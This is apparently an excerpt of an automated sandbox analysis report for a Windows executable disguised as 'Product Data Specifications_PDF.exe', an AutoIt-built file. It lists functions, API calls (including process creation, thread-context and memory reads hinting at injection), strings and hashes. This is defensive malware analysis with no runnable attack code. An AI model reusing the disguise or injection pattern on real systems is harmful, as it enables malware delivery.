                              • ShowWindow.USER32(?,00000000), ref: 004105E4
                              • ShowWindow.USER32(?,00000000), ref: 004105EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$CreateShow
                              • String ID: AutoIt v3$edit
                              • API String ID: 1584632944-3779509399
                              • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                              • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                              • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                              • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                              Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Copy$ClearErrorLast
                              • String ID: NULL Pointer assignment$Not an Object type
                              • API String ID: 2487901850-572801152
                              • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                              • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                              • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                              • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                              Function 04004C40 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 159fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 04004B30: Sleep.KERNELBASE(000001F4), ref: 04004B41
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04004DA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1383212336.0000000004002000.00000040.00000020.00020000.00000000.sdmp, Offset: 04002000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4002000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateFileSleep
                              • String ID: GQTXFNCXMEJFZ8XD7
                              • API String ID: 2694422964-2635057786
                              • Opcode ID: 29a1819a0eab1f4d0f5d5b4c89f2ee1b4d2d3945b58be160dd30b51a8b75350f
                              • Instruction ID: a873e1ce7b98019ce12313b02f48991f20144e5284b843478aa5e012f5aabe41
                              • Opcode Fuzzy Hash: 29a1819a0eab1f4d0f5d5b4c89f2ee1b4d2d3945b58be160dd30b51a8b75350f
                              • Instruction Fuzzy Hash: 07619631D04248DBEF10DBA4C854BEEBB75EF59304F008199E608BB2C0D7BA5B45CB6A
                              Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                              Download Yara Rule
                              APIs
                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcsncpy.LIBCMT ref: 00401C41
                              • _wcscpy.LIBCMT ref: 00401C5D
                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                              • String ID: Line:
                              • API String ID: 1874344091-1585850449
                              • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                              • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                              • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                              • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                              Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                              • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                              • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                              • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Close$OpenQueryValue
                              • String ID: Control Panel\Mouse
                              • API String ID: 1607946009-824357125
                              • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                              • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                              • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                              • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                              Function 04003B30 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 040042EB
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04004381
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040043A3
                              Memory Dump Source
                              • Source File: 00000006.00000002.1383212336.0000000004002000.00000040.00000020.00020000.00000000.sdmp, Offset: 04002000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4002000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                              • Instruction ID: aba3eb301d6a8c860a69e37fa4bd19397d3ff64558e2c1d5a5f5cf7ee299a17c
                              • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                              • Instruction Fuzzy Hash: D162EB30A14258DBEB24DFA4C850BDEB376EF58304F1091A9D20DEB2D4E7759E81CB5A
                              Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                              • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                              • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                              • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                              Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0047950F
                              • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                              • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                              • VariantClear.OLEAUT32(?), ref: 00479650
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$AllocClearCopyInitString
                              • String ID:
                              • API String ID: 2808897238-0
                              • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                              • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                              • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                              • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                              Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                              • _free.LIBCMT ref: 004295A0
                                • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                              • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                              • API String ID: 3938964917-2594136341
                              • Opcode ID: 8f7df58051baccb1ece1a656c44b13ba1264becb6641c2440e09932015da04d6
                              • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                              • Opcode Fuzzy Hash: 8f7df58051baccb1ece1a656c44b13ba1264becb6641c2440e09932015da04d6
                              • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                              Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: Error:
                              • API String ID: 4104443479-232661952
                              • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                              • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                              • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                              • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                              Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                              Download Yara Rule
                              APIs
                              • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,0040F545,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,004A90E8,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                              • String ID: X$pWH
                              • API String ID: 85490731-941433119
                              • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                              • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                              • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                              • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                              Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              • _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _memmove.LIBCMT ref: 00401B57
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                              • String ID: @EXITCODE
                              • API String ID: 2734553683-3436989551
                              • Opcode ID: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                              • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                              • Opcode Fuzzy Hash: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                              • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                              Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                              Download Yara Rule
                              Strings
                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                              • C:\Users\user\Desktop\Product Data Specifications_PDF.exe, xrefs: 00410107
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _strcat
                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                              • API String ID: 1765576173-1088594522
                              • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                              • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                              • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                              • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                              Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                              • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                              • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                              • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                              Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __filbuf__getptd_noexit__read_memcpy_s
                              • String ID:
                              • API String ID: 1794320848-0
                              • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                              • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                              • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                              • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                              Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                              • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process$CurrentTerminate
                              • String ID:
                              • API String ID: 2429186680-0
                              • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                              • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
